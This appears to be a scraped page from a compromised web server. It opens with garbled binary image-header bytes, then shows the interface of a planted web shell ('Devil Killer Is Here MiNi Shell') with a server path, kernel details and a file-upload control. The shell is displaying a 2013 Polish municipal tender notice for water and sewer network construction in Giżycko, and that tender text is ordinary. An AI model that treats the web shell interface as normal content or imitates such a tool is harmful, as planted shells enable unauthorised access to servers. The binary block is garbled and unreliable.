JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130325/44655-N-2013.html

<p class="kh_header"><b>Giżycko: Budowa sieci wodociągowych i kanalizacji sanitarnej na terenie Gminy Giżycko
w miejscowościach: Bogaczewo, Wrony, Kozin, Sterławki Średnie, Gajewo, 
Sulimy, Wilkasy</b><br>
<b>Numer ogłoszenia: 44655 - 2013; data zamieszczenia: 25.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Giżycko , ul. Mickiewicza 33, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 087 4299978.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.warmia.mazury.pl/gizycko_gmina_wiejska/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowych i kanalizacji sanitarnej na terenie Gminy Giżycko
w miejscowościach: Bogaczewo, Wrony, Kozin, Sterławki Średnie, Gajewo, 
Sulimy, Wilkasy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane sieci wodociągowych i kanalizacji sanitarnej 
na terenie Gminy Giżycko w miejscowościach: Bogaczewo, Wrony, Kozin, Sterławki Średnie, Gajewo, Sulimy, Wilkasy.

Zamawiający dokonał podziału zamówienia do realizacji na 3 zadania
Zadanie nr I
Budowa sieci wodociągowej i kanalizacji sanitarnej w miejscowości Wilkasy dz:  297, 367/6
Zadanie nr II
Kozin dz. nr: 114, 113, 112, 111, 111/1, 540/1, 248/1, 41, 42/2, 40, 219, 29/2,  28/4, 250, 28/1 - obr. ewidencyjny nr 3 Bogaczewo, dz. nr: 141/7, 142/1, 144/7, 144/8, 144/5, 101/11, 101/12, 104/2, 104/1, 143/7, 101/7, 99, 43/8, 43/4, 96/5, 96/2, 96/4, 94/2, 94/4, 94/6, 92, 87/9, 87/12, 90/10, 90/4, 90/3, 90/2, 90/1, 87/13, 87/6, 179, 83/5, 83/3, 80, 81/3, 81/2, 81/4, 81/1, 152/2, 79/1, 78/7, 78/13, 78/16, 78/18, 78/10, 78/12, 77/11, 77/13, 77/14, 77/7, 77/5, 77/15, 77/10, 77/9, 74/4, 74/5, 74/6, 74/7, 74/8, 72/1, 166, 61/2, 61/14, 63/2, 63/4, 64/1, 164, 60/4, 65/1, 57/9,  57/16, 57/28, 66/6, 66/11, 66/12, 86, 88/8, 88/7, 88/6, 88/5, 88/4, 89/4, 89/3, 89/6, 89/5, 91, 93/1, 93/2, 95/2, 95/1, 97/3, 97/2, 97/1, 98/3, 98/6, 98/5, 98/1, 100, 102, 103/1, 103/2, 105/3, 105/4, 151/2 - obr. ewidencyjny nr 23 Kozin
Wrony dz: 13/1, 13/2, 13/3, 13/8, 13/24, 13/36, 13/41, 66 
Wilkasy ul. Sosnowa dz: 353/1, 353/2, 253/6, 353/7, 378, 379/1, 384, 385, 395, 458
Zadanie nr III
Budowa sieci wodociągowej i kanalizacji sanitarnej w miejscowościach: 
Bogaczewo dz: 103/16, 103/17, 103/18, 103/19, 103/20, 103/21, 103/22, 103/23
Gajewo ul. Dębowa dz: 228, 229, 225/4, 234, 217/1, 249, 248, 230/2
Gajewo ul. Poleska dz: 53/7
Gajewo ul. Grzybowa, dz:  49/7, 49/8, 29, 25, 26, 21, 20/13, 20/14
Gajewo dz: 208/76, 208/83
Wrony dz: 8/2, 8/169, 8/187, 8/188, 8/189, 9/2, 9/7, 9/8, 9/9, 9/10, 9/18, 9/19, 10/15, 60, 66, 132
Sulimy dz: 193, 159/6
Sulimy dz: 193, 115/1, 115/2, 115/3
Sterławki Średnie dz: 1/49, 1/83, 1/84, 1/85, 1/86, 1/87, 1/88, 1/89, 1/90, 1/91, 1/92, 1/94, 1/95
Do Wykonawcy w zakresie realizacji przedmiotu zamówienia należy:
1) wykonanie sieci wodociągowych i kanalizacji sanitarnych na podstawie załączonej dokumentacji  zgodnie z  harmonogramem częściowym. 
2) należy wycenić i ująć w wycenie wszystkie koszty związane z realizacją zadania, 
tj. wynikające wprost z opisu przedmiotu zamówienia, dokumentacji projektowo-technicznych,
jak również inne koszty towarzyszące np.: wszelkich robót przygotowawczych, porządkowych, projektu organizacji placu budowy wraz z jego późniejszą likwidacją, obsługi geodezyjnej 
(w szczególności: wytyczenie projektowanych elementów w terenie, kontrola posadowienia wytyczonych elementów względem granic nieruchomości przylegających do prowadzonej inwestycji, markowanie granic o ustalonych punktach granicznych w miejscach, w których brak jest jednoznacznych danych geodezyjnych co do przebiegu granic, okazanie granic w celu jednoznacznego wytyczenia projektowanych elementów, pomiar powykonawczy z określeniem zgodności przebiegu do dokumentacji projektowej, inwentaryzacja geodezyjna powykonawcza) koszty utrzymania zaplecza budowy, koszty związane z odbiorami wykonanych robót, koszty wynikające z warunków uzgodnień i decyzji oraz koszty wymiany gruntu, odwodnienia wykopów, naprawy i odbudowy dróg, zagęszczenia gruntu, zajęcia pasa dróg publicznych (nie dotyczy ew. zajęcia pasa na potrzeby umieszczenia urządzeń obcych - po stronie Zamawiającego), koszty uzyskania niezbędnych decyzji, zezwoleń, pozwoleń, koszty wykonania i zatwierdzenia tymczasowego projektu organizacji ruchu itd.,
3) Wykonawca zobowiązany będzie do ścisłej współpracy: z Inspektorem Nadzoru Inwestorskiego i przedstawicielem Zamawiającego,
4) Wykonawca zobowiązany będzie na swój koszt do przeprowadzenia na bieżąco badań zagęszczenia gruntów (w tym podsypki, zasypki) i okazywania ich na żądanie Inspektora Nadzoru Inwestorskiego,
5) Wykonawca zobowiązany będzie do przeprowadzenia prac w sposób minimalizujący szkody
na przyległych gruntach rolnych. O terminie wejścia na działkę i prowadzenia prac Wykonawca poinformuje właścicieli działek z 2-tygodniowym wyprzedzeniem, 
a po zakończeniu robót przed odbiorem końcowym danej części składowej zadania Wykonawca zobowiązuje się uzyskać i przedłożyć Zamawiającemu oświadczenia właścicieli działek, że nie wnoszą oni roszczeń w związku z przeprowadzonymi robotami,
6) wykonywane prace należy skoordynować z pracami polowymi na gruntach rolnych 
w obrębie planowanej inwestycji,
7) przed rozpoczęciem robót Wykonawca przedłoży do akceptacji Inspektora Nadzoru dokumenty potwierdzające spełnienie wymogów dotyczących materiałów przewidzianych 
do zabudowy,
8) po wykonaniu zadania (dot. wodociągu) przed włączeniem do sieci, Wykonawca na swój koszt dokona badania wody pod względem bakteriologicznym i przedłoży Zamawiającemu ocenę jakości wody na podstawie sprawozdania z badania wody,
9) Wykonawca przedłoży Zamawiającemu dokumentację odbiorową w 2 egz.
Na dokumentację odbiorową składa się:
a) oryginał dziennika budowy,
b) oświadczenie Kierownika budowy (na podstawie art. 57 ust. 1 pkt 2a i 2b ustawy Prawo budowlane, Dz.U. z 2010 r Nr 243 pz. 1623 ze zm.),
c) aktualne zaświadczenie o przynależności do Okręgowej Izby Samorządu Zawodowego 
i decyzja o stwierdzeniu przygotowania zawodowego do pełnienia samodzielnych funkcji 
w budownictwie - dot. kierownika budowy,
d) ocena jakości wody na podstawie sprawozdań z laboratoryjnych badań wody pod względem bakteriologicznym, 
e) protokół z przeprowadzonej próby ciśnieniowej szczelności sieci wodociągowej,
f) deklaracje zgodności, certyfikaty, atesty higieniczne, aprobaty techniczne na wbudowane materiały,
g) inwentaryzacja geodezyjna powykonawcza - 3 kpl.,
h) oświadczenia właścicieli działek o uporządkowaniu terenu po wykonanych robotach.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.23.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający określa wadium na kwotę 150 000,00 PLN (słownie: sto pięćdziesiąt tysięcy złotych).
W przypadku złożenia ofert częściowych wysokość wadium dla każdego Zadania wynosi  odpowiednio:
Zadanie  nr I na kwotę 2 500,00 (słownie: dwa tysiące pięćset 00/100 złotych)
Zadanie nr II na kwotę  75 000,00 (słownie: siedemdziesiąt pięć tysięcy 00/100 złotych)
Zadanie nr III  na kwotę 72 500,00 (słownie: siedemdziesiąt dwa tysiące pięćset 00/100 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, Wykonawca musi wykazać, że wykonał (zakończył), co najmniej dwa zadania o charakterze i złożoności porównywalnej z przedmiotem zamówienia wybranego zadania, (zamawiający ubiegający się o zadanie nr II lub nr  III powinien wykazać ze wykonał, co najmniej dwa zadania o wartości min 1 000 000,00 zł brutto każda z robót) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Należy podać ich rodzaj i wartość oraz daty i miejsca wykonania oraz załączyć dokumenty potwierdzające, że te roboty zostały wykonane zgodnie z zasadami sztuki i prawidłowo ukończone. Ocena spełnienia warunku w postępowaniu dokonana będzie w oparciu o złożony wykaz i dokumenty na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie niezbędnym do wykazania spełnienia warunku osoby zdolne do wykonania zamówienia Wykonawcy musi wykazać ze dysponuje (załączą wykaz) co najmniej jedną osobą (osobami), która będzie uczestniczyć w wykonywaniu zamówienia,
w szczególności odpowiedzialna za kierowanie robotami budowlanymi, wraz 
z informacją na temat jej kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą. Do powyższego wykazu powinny być dołączone oświadczenie, że osoba, które będą uczestniczyć 
w wykonywaniu zamówienia, posiadają wymagane uprawnienia budowlane 
do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń 
do kierowania robotami budowlanymi, których zakres obejmuje co najmniej sieci sanitarne (wodociąg, kanalizacja). Ocena spełnienia warunku w postępowaniu dokonana będzie w oparciu o złożony wykaz i dokumenty na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada opłaconą polisę (na wartość min. 100 000,00 złotych dla ubiegających się o zadanie nr I i 1.000.000,00 złotych dla ubiegających się o zadanie nr II lub III), a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełnienia warunku w postępowaniu dokonana będzie w oparciu o złożone dokumenty na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zaparafowany projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w przypadku: 
1. wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji- zmianie ulega termin realizacji zamówienia,
2. zaistnienia innych, niemożliwych do przewidzenia w momencie zawarcia umowy okoliczność prawnych, ekonomicznych lub technicznych, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - zmianie ulega termin realizacji zamówienia, 
3. zmiany przepisów w zakresie stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/gizycko_gmina_wiejska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Giżycko ul. Mickiewicza 33 11-500 Giżycko pok nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2013 godzina 10:00, miejsce: Urząd Gminy Giżycko ul. Mickiewicza 33 11-500 Giżycko sekretariat pok nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pogram Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I. Budowa sieci wodociągowej i kanalizacji sanitarnej w miejscowości Wilkasy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa sieci wodociągowej i kanalizacji sanitarnej w miejscowości Wilkasy dz:  297, 367/6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.23.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr II. Budowa sieci wodociągowej i kanalizacji sanitarnej w miejscowościach: Kozin, Wrony, Wilkasy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa sieci wodociągowej i kanalizacji sanitarnej w miejscowościach: 
Kozin dz. nr: 114, 113, 112, 111, 111/1, 540/1, 248/1, 41, 42/2, 40, 219, 29/2,  28/4, 250, 28/1 - obr. ewidencyjny nr 3 Bogaczewo, 
dz. nr: 141/7, 142/1, 144/7, 144/8, 144/5, 101/11, 101/12, 104/2, 104/1, 143/7, 101/7, 99, 43/8, 43/4, 96/5, 96/2, 96/4, 94/2, 94/4, 94/6, 92, 87/9, 87/12, 90/10, 90/4, 90/3, 90/2, 90/1, 87/13, 87/6, 179, 83/5, 83/3, 80, 81/3, 81/2, 81/4, 81/1, 152/2, 79/1, 78/7, 78/13, 78/16, 78/18, 78/10, 78/12, 77/11, 77/13, 77/14, 77/7, 77/5, 77/15, 77/10, 77/9, 74/4, 74/5, 74/6, 74/7, 74/8, 72/1, 166, 61/2, 61/14, 63/2, 63/4, 64/1, 164, 60/4, 65/1, 57/9,  57/16, 57/28, 66/6, 66/11, 66/12, 86, 88/8, 88/7, 88/6, 88/5, 88/4, 89/4, 89/3, 89/6, 89/5, 91, 93/1, 93/2, 95/2, 95/1, 97/3, 97/2, 97/1, 98/3, 98/6, 98/5, 98/1, 100, 102, 103/1, 103/2, 105/3, 105/4, 151/2 - obr. ewidencyjny nr 23 Kozin
Wrony dz: 13/1, 13/2, 13/3, 13/8, 13/24, 13/36, 13/41, 66 
Wilkasy ul. Sosnowa dz: 353/1, 353/2, 253/6, 353/7, 378, 379/1, 384, 385, 395, 458.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.23.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr III. Budowa sieci wodociągowej i kanalizacji sanitarnej w miejscowościach: Bogaczewo, Gajewo, Wrony, Sulimy, Sterławki Średnie.</p>
